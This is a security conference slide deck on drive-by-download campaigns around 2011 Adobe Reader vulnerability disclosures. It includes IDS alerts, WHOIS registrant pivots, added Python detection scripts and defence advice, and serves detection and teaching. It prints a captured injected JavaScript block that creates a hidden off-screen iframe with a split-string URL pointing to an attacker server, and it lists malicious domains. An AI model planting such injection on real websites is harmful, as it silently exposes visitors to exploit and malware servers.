Drive-By-Download Attack Evolution Before and After Vulnerability Disclosure

Vladimir B. Kropotov
TBINFORM (TNK-BP Group)
Drive-By-Download
• Hackers distribute malware by "poisoning" legitimate websites
• The hacker injects malicious iframes into HTML content
• Vulnerabilities in browsers, Acrobat, Java, Flash Player, etc. are used by the attacker
(Slide illustration caption: You just want information about insurance, nothing more, but…)
What does it look like?
(Diagram: a PC connected to the Internet loads a known server carrying the injected iframe; the iframe leads to an intermediate server controlled by the attacker; the PC's OS, browser and plugin info goes to an exploit server controlled by the attacker, which returns the exploit; once the host is ready, a malware server controlled by the attacker delivers the malware.)
How we find it?
IDS alert:
Date/Time           2011-08-05 10:44:53 YEKST
Tag Name            PDF_XFA_Script
Observance Type     Intrusion Detection
Cleared Flag        false
Target IP Address   10.X.X.X
Target Object Name  9090
Target Object Type  Target Port
Target Service      unknown
Source IP Address   10.X.X.Y
SourcePort Name     2359
compressed          zlib
server              total.logeater.org
URL                 //images/np/45eebb038bd46a63e08665f3081fb408/6cd14aca59271182c8a04159f9ad2804.pdf
DOES USER NEED IT??
First indicators
(six alerts, in chronological order)

Date/Time   2011-07-26 11:24:37
Tag Name    PDF_XFA_Script
arg         3592ba48df0fae9e5f5c5b09535a070d0b04020600510f0c56075c06040750
compressed  zlib
server      mamjhvbw.dyndns.pro
URL         /ghqlv3ym/

Date/Time   2011-08-09 10:17:14
Tag Name    PDF_XFA_Script
arg         host=http://inaptly.in&b=486def4
compressed  gzip
server      inaptly.in
URL         /jb/lastrger.php

Date/Time   2011-08-14 14:06:28
Tag Name    PDF_XFA_Script
arg         host=http://oligist.in&b=486def4
compressed  gzip
server      oligist.in
URL         /jb/lastrger.php

Date/Time   2011-08-16 13:24:44
Tag Name    ActiveX_Warning
clsid       CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA
server      skipetar.in
URL         /jb/pda.js

Date/Time   2011-08-18 19:00:13
Tag Name    ActiveX_Warning
clsid       CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA
server      e1in.in
URL         /stat/574a353789f/pda.js

Date/Time   2011-08-18 19:00:13
Tag Name    PDF_XFA_Script
arg         host=http://e1in.in/stat&u=root
compressed  zlib
server      e1in.in
URL         /stat/574a353789f/lastrger.php
Example: o-strahovanie.ru (Sep 02)
Script injected into the site's pages, reconstructed from the slides. The document.xmlSettings.time(), getCookie() and setCookie() helpers it calls are part of the same injection but are not shown. The attacker's own comment "4 osel" marks the cookie fallback branch.

    / ============ bbb ============
    // Per-visitor marker: the iframe is injected at most once per 30 days (2592000 s),
    // tracked in localStorage where available, otherwise in a cookie.
    document.xmlSettings.if_ik=false;
    if(window.localStorage){
        if(window.localStorage.if_ik){
            if(parseInt(window.localStorage.if_ik)+2592000 < document.xmlSettings.time())
                document.xmlSettings.if_ik=true;
        }else
            document.xmlSettings.if_ik=true;
    }else{// 4 osel
        if(document.xmlSettings.getCookie('if_ik')){
            if(parseInt(document.xmlSettings.getCookie('if_ik'))+2592000 < document.xmlSettings.time())
                document.xmlSettings.if_ik=true;
        }else
            document.xmlSettings.if_ik=true;
    }
    if(document.xmlSettings.if_ik){
        if(window.localStorage)window.localStorage.if_ik=document.xmlSettings.time();
        else document.xmlSettings.setCookie('if_ik',document.xmlSettings.time(),{expires:(document.xmlSettings.time() + 86400*365)});
        // 1x1 px iframe positioned off-screen, pointing at the intermediate server.
        // The URL is split into string fragments, so the full URL never appears literally in the page.
        document.xmlSettings.iframe=document.createElement('iframe');
        document.xmlSettings.iframe.style.cssText='height:1px;position:absolute;width:1px;border:none;left:-5000px;';
        document.body.appendChild(document.xmlSettings.iframe);
        document.xmlSettings.iframe.src='htt'+'p://'+'disreg'+'arding.i'+'n/xtqd2/08.p'+'hp';
    }

Marker cookie left in the visitor's browser:
    if_ik  1315314771  www.o-strahovanie.ru/  1600429305625633310239293001403230174358*

Concatenated, the iframe source is:
    iframe.src='http://disregarding.in/xtqd2/08.php'
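A detector for the injection pattern above, added here as an example (it is not code from the talk): it reassembles URLs that exist in a page only as concatenated string fragments, and flags script-created iframes styled 1px/off-screen together with the 30-day revisit marker. The sample HTML is constructed from the slide's script; all function and constant names are my own.

```python
import re
from dataclasses import dataclass
from urllib.parse import urlsplit

# Constructed sample page: a condensed copy of the injected block from the slides (not the live site).
SAMPLE_HTML = """<html><body><h1>Insurance news</h1>
<script>
document.xmlSettings.if_ik=false;
if(window.localStorage){if(window.localStorage.if_ik){
if(parseInt(window.localStorage.if_ik)+2592000 < document.xmlSettings.time())
document.xmlSettings.if_ik=true;}else document.xmlSettings.if_ik=true;}
if(document.xmlSettings.if_ik){
document.xmlSettings.iframe=document.createElement('iframe');
document.xmlSettings.iframe.style.cssText='height:1px;position:absolute;width:1px;border:none;left:-5000px;';
document.body.appendChild(document.xmlSettings.iframe);
document.xmlSettings.iframe.src='htt'+'p://'+'disreg'+'arding.i'+'n/xtqd2/08.p'+'hp';}
</script></body></html>"""

# Constructed benign control: ordinary string concatenation and a visible, static iframe.
CLEAN_HTML = """<html><body><h1>Insurance news</h1>
<script>var base='/api/'+'v1/';</script>
<iframe src="https://maps.example/embed" width="400" height="300"></iframe>
</body></html>"""

# A single- or double-quoted JS string literal without escapes or line breaks.
_LIT = r"(?:'[^'\\\n]*'|\"[^\"\\\n]*\")"
# Two or more literals joined by '+': the 'htt'+'p://'+... construction.
CONCAT_RE = re.compile(rf"{_LIT}(?:\s*\+\s*{_LIT})+")
URL_RE = re.compile(r"^https?://[^\s'\"<>]+$", re.IGNORECASE)
NEW_IFRAME_RE = re.compile(r"createElement\s*\(\s*['\"]iframe['\"]\s*\)", re.IGNORECASE)
HIDDEN_CSS_RE = re.compile(
    r"(?:height|width)\s*:\s*[01]px|left\s*:\s*-\d{3,}px|visibility\s*:\s*hidden|display\s*:\s*none",
    re.IGNORECASE)
# A storage/cookie marker compared against the 30-day constant seen in the injection.
THROTTLE_RE = re.compile(r"(?:localStorage|getCookie|setCookie)[\s\S]{0,300}?\b2592000\b")


@dataclass
class Finding:
    kind: str
    detail: str


def join_literals(expr):
    """'htt'+'p://'+... -> 'http://...' (drops the quotes, keeps the order)."""
    return "".join(part[1:-1] for part in re.findall(_LIT, expr))


def split_urls(html):
    """URLs that only exist in the page as a chain of concatenated string fragments."""
    joined = (join_literals(m.group(0)) for m in CONCAT_RE.finditer(html))
    return [u for u in joined if URL_RE.match(u)]


def scan_html(html):
    """Findings for one served page; an empty list means none of the injection markers are present."""
    findings = []
    for url in split_urls(html):
        findings.append(Finding("split-url", f"{urlsplit(url).hostname} <- {url}"))
    if NEW_IFRAME_RE.search(html) and HIDDEN_CSS_RE.search(html):
        findings.append(Finding("hidden-iframe", "script creates an iframe styled 1px / off-screen / invisible"))
    if THROTTLE_RE.search(html):
        findings.append(Finding("revisit-throttle", "per-visitor marker with a 2592000 s (30 day) period"))
    return findings
```

Run it over pages fetched through the same proxy path your users take; a "split-url" hit whose host is a domain registered days ago is exactly the combination the following slides describe.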
Drive By Download o-strahovanie.ru, Sep 02
(Diagram, same chain as above: the known server with the iframe leads to the intermediate server disregarding.in; on Sep 02 no exploit server and no malware server answered, marked "NO" on the slide.)

Drive By Download o-strahovanie.ru, Sep 12
(Diagram: known server with iframe, then intermediate server disregarding.in, then exploit server chamberwoman.in / janiculum.in, then malware server chamberwoman.in / janiculum.in.)
Example: o-strahovanie.ru (WHOIS)
Domain ID:           D5165642-AFIN
Domain Name:         DISREGARDING.IN
Created On:          14-Jul-2011 11:09:59 UTC
Registrant Name:     Russell Rosario
Registrant Street1:  136 Oakdale Avenue
City:                Winter Haven
Registrant Country:  US
Email:               russellsrosario@teleworm.com
Name Server:         NS1.PRIDES.ME
Name Server:         NS2.PRIDES.ME

Domain Name:         JANICULUM.IN, CHAMBERWOMAN.IN
Created On:          12-Sep-2011 08:14 UTC
Registrant Name:     Russell Rosario

No payload, because no payload requests? Are they looking for customers?

Same registrant, same registration batch as DISREGARDING.IN:
Domain          Created On
filtrated.in    14-Jul-2011 11:09:56 UTC
raptnesses.in   14-Jul-2011 11:09:56 UTC
tansies.in      14-Jul-2011 11:10:03 UTC

Full record for FILTRATED.IN:
Domain Name:                 FILTRATED.IN
Created On:                  14-Jul-2011 11:09:53 UTC
Sponsoring Registrar:        Directi Web Services Pvt. Ltd. (R118-AFIN)
Registrant ID:               TS_16731618
Registrant Name:             Russell Rosario
Registrant Street1:          136 Oakdale Avenue
Registrant City:             Winter Haven
Registrant State/Province:   Florida
Registrant Postal Code:      33830
Registrant Country:          US
Registrant Phone:            +1.8635571308
Email:                       russellsrosario@teleworm.com
But Sally Doesn't Know…

Attack before public disclosure
• Primary location for malicious sites: .IN
• Physical servers location by IP address: Romania
• Responsible person: Russell Rosario
• Domains are new

Domain owner is the same
Domain Name      Created On                 Registrant Name
irrefutably.in   15-Jul-2011 11:00:21 UTC   Russell Rosario
comprador.in     25-Jul-2011 05:59:54 UTC   Russell Rosario
hyalines.in      29-Jul-2011 09:39:33 UTC   Russell Rosario
suffrago.in      01-Aug-2011 05:35:12 UTC   Russell Rosario
ruritanian.in    01-Aug-2011 05:35:50 UTC   Russell Rosario
20-Jul-2011: Acrobat vulnerability, vendor notified
Vulnerabilities reported to the vendor on that date:
VUPEN Security Research - Adobe Acrobat and Reader PCX Processing Heap Overflow Vulnerability
VUPEN Security Research - Adobe Acrobat and Reader IFF Processing Heap Overflow Vulnerability
VUPEN Security Research - Adobe Acrobat and Reader Picture Dimensions Heap Overflow Vulnerability
VUPEN Security Research - Adobe Acrobat and Reader TIFF BitsPerSample Heap Overflow Vulnerability
X. DISCLOSURE TIMELINE
-----------------------------
2011-07-20 - Vulnerability Discovered by VUPEN and shared with TPP customers
2011-09-14 - Public disclosure

 ZDI-11-310 : Adobe Reader Compound Glyph Index Sign Extension Remote Code Execution Vulnerability
-- Disclosure Timeline:
2011-07-20 - Vulnerability reported to vendor
2011-10-26 - Coordinated public release of advisory

ZDI-11-316 : Apple QuickTime H264 Matrix Conversion Remote Code Execution Vulnerability
-- Disclosure Timeline:
2011-07-20 - Vulnerability reported to vendor
2011-10-27 - Coordinated public release of advisory
Harvesting machine started
Domain Name        Created On                 Registrant Name
microdrili.in      05-Aug-2011 07:13:08 UTC   Russell Rosario
oligist.in         05-Aug-2011 07:13:12 UTC   Russell Rosario
provost.in         05-Aug-2011 07:13:18 UTC   Russell Rosario
vaginalitis.in     05-Aug-2011 07:13:25 UTC   Russell Rosario
kremlinology.in    05-Aug-2011 07:13:35 UTC   Russell Rosario
invariance.in      05-Aug-2011 07:13:41 UTC   Russell Rosario
alleghenian.in     05-Aug-2011 07:13:48 UTC   Russell Rosario
dandifies.in       05-Aug-2011 07:14:06 UTC   Russell Rosario
xenophoby.in       05-Aug-2011 07:14:09 UTC   Russell Rosario
alliaria.in        05-Aug-2011 07:14:15 UTC   Russell Rosario
skipetar.in        05-Aug-2011 07:14:21 UTC   Russell Rosario
inaptly.in         05-Aug-2011 07:15:05 UTC   Russell Rosario
allhallowtide.in   05-Aug-2011 07:15:20 UTC   Russell Rosario
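The analyst pivot the deck walks through in "First indicators" and in the registrant tables, as an added example that is not code from the talk: parse the IDS key/value alerts, join each alerting host to WHOIS, and flag hosts whose domain was registered days before the first alert by a registrant who creates domains in bursts. The alert text and WHOIS table are constructed from the slides' values; e1in.in is deliberately absent from WHOIS, and the 120-second burst window and 30-day "young domain" threshold are my assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

FMT = "%Y-%m-%d %H:%M:%S"

# Constructed sample: four of the "First indicators" alerts, in the IDS key/value layout
# of the slides (some field names carry the stray leading ':' seen in the extraction).
ALERTS_TEXT = """\
Date/Time 2011-08-09 10:17:14
Tag Name PDF_XFA_Script
arg host=http://inaptly.in&b=486def4
server inaptly.in
URL /jb/lastrger.php

Date/Time 2011-08-16 13:24:44
Tag Name ActiveX_Warning
:clsid CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA
:server skipetar.in
:URL /jb/pda.js

Date/Time 2011-08-18 19:00:13
Tag Name ActiveX_Warning
clsid CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA
server e1in.in
URL /stat/574a353789f/pda.js

Date/Time 2011-08-18 19:00:13
Tag Name PDF_XFA_Script
arg host=http://e1in.in/stat&u=root
server e1in.in
URL /stat/574a353789f/lastrger.php
"""

# Constructed WHOIS table, domain -> (created, registrant), from the registrant slides
# (timestamps rewritten from the "14-Jul-2011 11:09:59 UTC" form); e1in.in was never shown.
WHOIS = {
    "filtrated.in": ("2011-07-14 11:09:53", "Russell Rosario"),
    "disregarding.in": ("2011-07-14 11:09:59", "Russell Rosario"),
    "tansies.in": ("2011-07-14 11:10:03", "Russell Rosario"),
    "oligist.in": ("2011-08-05 07:13:12", "Russell Rosario"),
    "skipetar.in": ("2011-08-05 07:14:21", "Russell Rosario"),
    "inaptly.in": ("2011-08-05 07:15:05", "Russell Rosario"),
}

FIELD_RE = re.compile(r"^:?(Date/Time|Tag Name|arg|clsid|compressed|server|URL)\s+(\S.*)$")


def parse_alerts(text):
    """One dict per alert; alerts are separated by blank lines, other lines are ignored."""
    alerts, cur = [], {}
    for line in (l.strip() for l in text.splitlines()):
        m = FIELD_RE.match(line)
        if m:
            cur[m.group(1)] = m.group(2)
        elif not line and cur:
            alerts.append(cur)
            cur = {}
    if cur:
        alerts.append(cur)
    return alerts


def bulk_registrations(whois, window=timedelta(seconds=120), min_size=3):
    """Registrant -> domains created in bursts of at least min_size within `window`
    (the 'harvesting machine' pattern: a script registering a batch of domains)."""
    by_reg = defaultdict(list)
    for domain, (created, registrant) in whois.items():
        by_reg[registrant].append((datetime.strptime(created, FMT), domain))
    bursts = defaultdict(set)
    for registrant, items in by_reg.items():
        items.sort()
        for start, _ in items:
            group = [d for t, d in items if start <= t <= start + window]
            if len(group) >= min_size:
                bursts[registrant].update(group)
    return dict(bursts)


def assess(alerts, whois, young=timedelta(days=30)):
    """Per alerting host, the reasons to treat it as drive-by infrastructure."""
    burst_domains = {d for ds in bulk_registrations(whois).values() for d in ds}
    hosts = defaultdict(lambda: {"tags": set(), "first_seen": None})
    for a in alerts:
        info = hosts[a["server"]]
        info["tags"].add(a["Tag Name"])
        seen = datetime.strptime(a["Date/Time"], FMT)
        if info["first_seen"] is None or seen < info["first_seen"]:
            info["first_seen"] = seen
    verdicts = {}
    for host, info in hosts.items():
        reasons = []
        if len(info["tags"]) > 1:  # several client-side exploit vectors served from one host
            reasons.append("mixed exploit alert types: " + ", ".join(sorted(info["tags"])))
        rec = whois.get(host)
        if rec is None:
            reasons.append("no WHOIS record on file")
        else:
            age = info["first_seen"] - datetime.strptime(rec[0], FMT)
            if age < young:
                reasons.append(f"domain {age.days} days old at first alert")
            if host in burst_domains:
                reasons.append(f"bulk-registered by {rec[1]}")
        verdicts[host] = reasons
    return verdicts
```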
But maybe someone knows?
• Spamlists: Aug 19
• AV vendors: Aug 18
• Safebrowsing: Aug 20
• Securityfocus: Sep 07
Sent: Wednesday, September 07, 2011 11:31 PM
Subject: There is a strange GET request header in all web pages of my site? I'm worried about a Trojan attack!

Today I found that Kasper Anti Virus has blocked my site and says to the clients that this site is affected by a Trojan. I traced my site with the Fiddler debugging tool and I found that every time I send a request to the site, a GET request handler is established to the following URL:
"http://carlos.c0m.li/iframe.php?id=v4pfa24nw91yhoszkdmoh413ywv6cp7"
PDF vulnerabilities public disclosure, Sep 14. What to expect?

NO GOOD NEWS, JUST EPIC FAIL for site administrators.
No good news: hundreds of domains were registered.
“New generation”
(Diagram: as before, the known server with the iframe leads to an intermediate server controlled by the attacker, which passes the visitor's OS, browser and plugin info to an exploit server and then a malware server, both controlled by the attacker; the new element is a second path from the intermediate server to an "other known server NOT controlled by the attacker".)
Attack after public disclosure
• Primary location for malicious sites: .IN, .RU, .CX.CC, .BIZ, .INFO, …
• Physical servers location by IP address: international
• Domains registered to different spurious persons
• Domain lifetime ~ time to blacklist appearance
• The attack refers to the malicious server for a short period of time, and to a well-known one almost all day long (blacklist evasion technique)
• If you don't know the exact malware URL, the site redirects to a well-known server
• Different types of payload used: password stealers, WinLockers, and even “normal” (or another ZD) files installed
Known sites examples
• RZD.RU (Russian Railways)
• KP.RU (Komsomolskaya Pravda, newspaper)
Other examples
• EG.RU (newspaper, 263 685 visits per day)
• svpressa.ru (newspaper, 276 720 visits per day)
Malware examples: banks targeted attack
(Screenshots. Caption: Another news, another phone… • Legal • Faked)
Malware examples
Script examples
Sample analysis (Virus Total)
(Screenshots of the VirusTotal results)
What can we do?
• Patch endpoints
• Tighten Internet filtering (default deny if possible)
• No Internet surfing with admin rights
• See what’s happening (continuous monitoring)
• Check if you’re well (regular technical audits)
• Educate people
Credits
• Sergey V. Soldatov,
                 TBINFORM (TNK-BP Group)
• Konstantin Y. Kadushkin,
                 TBINFORM (TNK-BP Group)
• Wayne Huang,
                 ARMORIZE
THE END

    Vladimir B. Kropotov
Information security analyst
 TBINFORM (TNK-BP Group)

  vbkropotov@tnk-bp.com
    kropotov@ieee.org

[Defcon Russia #29] Александр Ермолов - Safeguarding rootkits: Intel Boot Gua...[Defcon Russia #29] Александр Ермолов - Safeguarding rootkits: Intel Boot Gua...
[Defcon Russia #29] Александр Ермолов - Safeguarding rootkits: Intel Boot Gua...DefconRussia
 
[Defcon Russia #29] Алексей Тюрин - Spring autobinding
[Defcon Russia #29] Алексей Тюрин - Spring autobinding[Defcon Russia #29] Алексей Тюрин - Spring autobinding
[Defcon Russia #29] Алексей Тюрин - Spring autobindingDefconRussia
 
[Defcon Russia #29] Михаил Клементьев - Обнаружение руткитов в GNU/Linux
[Defcon Russia #29] Михаил Клементьев - Обнаружение руткитов в GNU/Linux[Defcon Russia #29] Михаил Клементьев - Обнаружение руткитов в GNU/Linux
[Defcon Russia #29] Михаил Клементьев - Обнаружение руткитов в GNU/LinuxDefconRussia
 
Георгий Зайцев - Reversing golang
Георгий Зайцев - Reversing golangГеоргий Зайцев - Reversing golang
Георгий Зайцев - Reversing golangDefconRussia
 
[DCG 25] Александр Большев - Never Trust Your Inputs or How To Fool an ADC
[DCG 25] Александр Большев - Never Trust Your Inputs or How To Fool an ADC [DCG 25] Александр Большев - Never Trust Your Inputs or How To Fool an ADC
[DCG 25] Александр Большев - Never Trust Your Inputs or How To Fool an ADC DefconRussia
 
Cisco IOS shellcode: All-in-one
Cisco IOS shellcode: All-in-oneCisco IOS shellcode: All-in-one
Cisco IOS shellcode: All-in-oneDefconRussia
 
Олег Купреев - Обзор и демонстрация нюансов и трюков из области беспроводных ...
Олег Купреев - Обзор и демонстрация нюансов и трюков из области беспроводных ...Олег Купреев - Обзор и демонстрация нюансов и трюков из области беспроводных ...
Олег Купреев - Обзор и демонстрация нюансов и трюков из области беспроводных ...DefconRussia
 
HTTP HOST header attacks
HTTP HOST header attacksHTTP HOST header attacks
HTTP HOST header attacksDefconRussia
 
Attacks on tacacs - Алексей Тюрин
Attacks on tacacs - Алексей ТюринAttacks on tacacs - Алексей Тюрин
Attacks on tacacs - Алексей ТюринDefconRussia
 
Weakpass - defcon russia 23
Weakpass - defcon russia 23Weakpass - defcon russia 23
Weakpass - defcon russia 23DefconRussia
 
nosymbols - defcon russia 20
nosymbols - defcon russia 20nosymbols - defcon russia 20
nosymbols - defcon russia 20DefconRussia
 
static - defcon russia 20
static  - defcon russia 20static  - defcon russia 20
static - defcon russia 20DefconRussia
 
Zn task - defcon russia 20
Zn task  - defcon russia 20Zn task  - defcon russia 20
Zn task - defcon russia 20DefconRussia
 
Vm ware fuzzing - defcon russia 20
Vm ware fuzzing  - defcon russia 20Vm ware fuzzing  - defcon russia 20
Vm ware fuzzing - defcon russia 20DefconRussia
 
Nedospasov defcon russia 23
Nedospasov defcon russia 23Nedospasov defcon russia 23
Nedospasov defcon russia 23DefconRussia
 
Advanced cfg bypass on adobe flash player 18 defcon russia 23
Advanced cfg bypass on adobe flash player 18 defcon russia 23Advanced cfg bypass on adobe flash player 18 defcon russia 23
Advanced cfg bypass on adobe flash player 18 defcon russia 23DefconRussia
 
Miasm defcon russia 23
Miasm defcon russia 23Miasm defcon russia 23
Miasm defcon russia 23DefconRussia
 
Andrey Belenko, Alexey Troshichev - Внутреннее устройство и безопасность iClo...
Andrey Belenko, Alexey Troshichev - Внутреннее устройство и безопасность iClo...Andrey Belenko, Alexey Troshichev - Внутреннее устройство и безопасность iClo...
Andrey Belenko, Alexey Troshichev - Внутреннее устройство и безопасность iClo...DefconRussia
 
Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях
Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условияхSergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях
Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условияхDefconRussia
 

Más de DefconRussia (20)

[Defcon Russia #29] Борис Савков - Bare-metal programming на примере Raspber...
[Defcon Russia #29] Борис Савков -  Bare-metal programming на примере Raspber...[Defcon Russia #29] Борис Савков -  Bare-metal programming на примере Raspber...
[Defcon Russia #29] Борис Савков - Bare-metal programming на примере Raspber...
 
[Defcon Russia #29] Александр Ермолов - Safeguarding rootkits: Intel Boot Gua...
[Defcon Russia #29] Александр Ермолов - Safeguarding rootkits: Intel Boot Gua...[Defcon Russia #29] Александр Ермолов - Safeguarding rootkits: Intel Boot Gua...
[Defcon Russia #29] Александр Ермолов - Safeguarding rootkits: Intel Boot Gua...
 
[Defcon Russia #29] Алексей Тюрин - Spring autobinding
[Defcon Russia #29] Алексей Тюрин - Spring autobinding[Defcon Russia #29] Алексей Тюрин - Spring autobinding
[Defcon Russia #29] Алексей Тюрин - Spring autobinding
 
[Defcon Russia #29] Михаил Клементьев - Обнаружение руткитов в GNU/Linux
[Defcon Russia #29] Михаил Клементьев - Обнаружение руткитов в GNU/Linux[Defcon Russia #29] Михаил Клементьев - Обнаружение руткитов в GNU/Linux
[Defcon Russia #29] Михаил Клементьев - Обнаружение руткитов в GNU/Linux
 
Георгий Зайцев - Reversing golang
Георгий Зайцев - Reversing golangГеоргий Зайцев - Reversing golang
Георгий Зайцев - Reversing golang
 
[DCG 25] Александр Большев - Never Trust Your Inputs or How To Fool an ADC
[DCG 25] Александр Большев - Never Trust Your Inputs or How To Fool an ADC [DCG 25] Александр Большев - Never Trust Your Inputs or How To Fool an ADC
[DCG 25] Александр Большев - Never Trust Your Inputs or How To Fool an ADC
 
Cisco IOS shellcode: All-in-one
Cisco IOS shellcode: All-in-oneCisco IOS shellcode: All-in-one
Cisco IOS shellcode: All-in-one
 
Олег Купреев - Обзор и демонстрация нюансов и трюков из области беспроводных ...
Олег Купреев - Обзор и демонстрация нюансов и трюков из области беспроводных ...Олег Купреев - Обзор и демонстрация нюансов и трюков из области беспроводных ...
Олег Купреев - Обзор и демонстрация нюансов и трюков из области беспроводных ...
 
HTTP HOST header attacks
HTTP HOST header attacksHTTP HOST header attacks
HTTP HOST header attacks
 
Attacks on tacacs - Алексей Тюрин
Attacks on tacacs - Алексей ТюринAttacks on tacacs - Алексей Тюрин
Attacks on tacacs - Алексей Тюрин
 
Weakpass - defcon russia 23
Weakpass - defcon russia 23Weakpass - defcon russia 23
Weakpass - defcon russia 23
 
nosymbols - defcon russia 20
nosymbols - defcon russia 20nosymbols - defcon russia 20
nosymbols - defcon russia 20
 
static - defcon russia 20
static  - defcon russia 20static  - defcon russia 20
static - defcon russia 20
 
Zn task - defcon russia 20
Zn task  - defcon russia 20Zn task  - defcon russia 20
Zn task - defcon russia 20
 
Vm ware fuzzing - defcon russia 20
Vm ware fuzzing  - defcon russia 20Vm ware fuzzing  - defcon russia 20
Vm ware fuzzing - defcon russia 20
 
Nedospasov defcon russia 23
Nedospasov defcon russia 23Nedospasov defcon russia 23
Nedospasov defcon russia 23
 
Advanced cfg bypass on adobe flash player 18 defcon russia 23
Advanced cfg bypass on adobe flash player 18 defcon russia 23Advanced cfg bypass on adobe flash player 18 defcon russia 23
Advanced cfg bypass on adobe flash player 18 defcon russia 23
 
Miasm defcon russia 23
Miasm defcon russia 23Miasm defcon russia 23
Miasm defcon russia 23
 
Andrey Belenko, Alexey Troshichev - Внутреннее устройство и безопасность iClo...
Andrey Belenko, Alexey Troshichev - Внутреннее устройство и безопасность iClo...Andrey Belenko, Alexey Troshichev - Внутреннее устройство и безопасность iClo...
Andrey Belenko, Alexey Troshichev - Внутреннее устройство и безопасность iClo...
 
Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях
Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условияхSergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях
Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях
 

Último

Decarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a realityDecarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a realityIES VE
 
Scale your database traffic with Read & Write split using MySQL Router
Scale your database traffic with Read & Write split using MySQL RouterScale your database traffic with Read & Write split using MySQL Router
Scale your database traffic with Read & Write split using MySQL RouterMydbops
 
So einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdfSo einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdfpanagenda
 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxUse of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxLoriGlavin3
 
Genislab builds better products and faster go-to-market with Lean project man...
Genislab builds better products and faster go-to-market with Lean project man...Genislab builds better products and faster go-to-market with Lean project man...
Genislab builds better products and faster go-to-market with Lean project man...Farhan Tariq
 
UiPath Community: Communication Mining from Zero to Hero
UiPath Community: Communication Mining from Zero to HeroUiPath Community: Communication Mining from Zero to Hero
UiPath Community: Communication Mining from Zero to HeroUiPathCommunity
 
Zeshan Sattar- Assessing the skill requirements and industry expectations for...
Zeshan Sattar- Assessing the skill requirements and industry expectations for...Zeshan Sattar- Assessing the skill requirements and industry expectations for...
Zeshan Sattar- Assessing the skill requirements and industry expectations for...itnewsafrica
 
Generative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdfGenerative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdfIngrid Airi González
 
Design pattern talk by Kaya Weers - 2024 (v2)
Design pattern talk by Kaya Weers - 2024 (v2)Design pattern talk by Kaya Weers - 2024 (v2)
Design pattern talk by Kaya Weers - 2024 (v2)Kaya Weers
 
React Native vs Ionic - The Best Mobile App Framework
React Native vs Ionic - The Best Mobile App FrameworkReact Native vs Ionic - The Best Mobile App Framework
React Native vs Ionic - The Best Mobile App FrameworkPixlogix Infotech
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024BookNet Canada
 
Top 10 Hubspot Development Companies in 2024
Top 10 Hubspot Development Companies in 2024Top 10 Hubspot Development Companies in 2024
Top 10 Hubspot Development Companies in 2024TopCSSGallery
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024Lonnie McRorey
 
Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...
Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...
Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...Alkin Tezuysal
 
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024BookNet Canada
 
Glenn Lazarus- Why Your Observability Strategy Needs Security Observability
Glenn Lazarus- Why Your Observability Strategy Needs Security ObservabilityGlenn Lazarus- Why Your Observability Strategy Needs Security Observability
Glenn Lazarus- Why Your Observability Strategy Needs Security Observabilityitnewsafrica
 
Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024Hiroshi SHIBATA
 
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxDigital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxLoriGlavin3
 
2024 April Patch Tuesday
2024 April Patch Tuesday2024 April Patch Tuesday
2024 April Patch TuesdayIvanti
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxLoriGlavin3
 

Último (20)

Decarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a realityDecarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a reality
 
Scale your database traffic with Read & Write split using MySQL Router
Scale your database traffic with Read & Write split using MySQL RouterScale your database traffic with Read & Write split using MySQL Router
Scale your database traffic with Read & Write split using MySQL Router
 
So einfach geht modernes Roaming fuer Notes und Nomad.pdf
